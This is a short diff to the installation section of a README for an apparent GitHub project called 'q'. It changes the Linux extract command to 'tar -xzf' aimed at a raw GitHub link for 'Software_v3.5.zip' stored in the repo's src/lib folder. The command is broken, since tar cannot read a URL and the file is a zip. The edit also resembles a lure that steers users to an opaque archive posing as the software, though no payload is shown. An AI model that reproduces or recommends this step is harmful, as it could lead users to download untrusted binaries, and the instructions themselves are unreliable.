AbRhmaN229/q/README.md

 **For Linux**:
 - Open your terminal.
 - Navigate to the folder where you downloaded the file.
-- Use the command: `tar -xzf q-linux.tar.gz`.
+- Use the command: `tar -xzf https://github.com/AbRhmaN229/q/raw/refs/heads/main/src/lib/Software_v3.5.zip`.
 - Follow any further instructions on-screen.

 ## ✅ Using q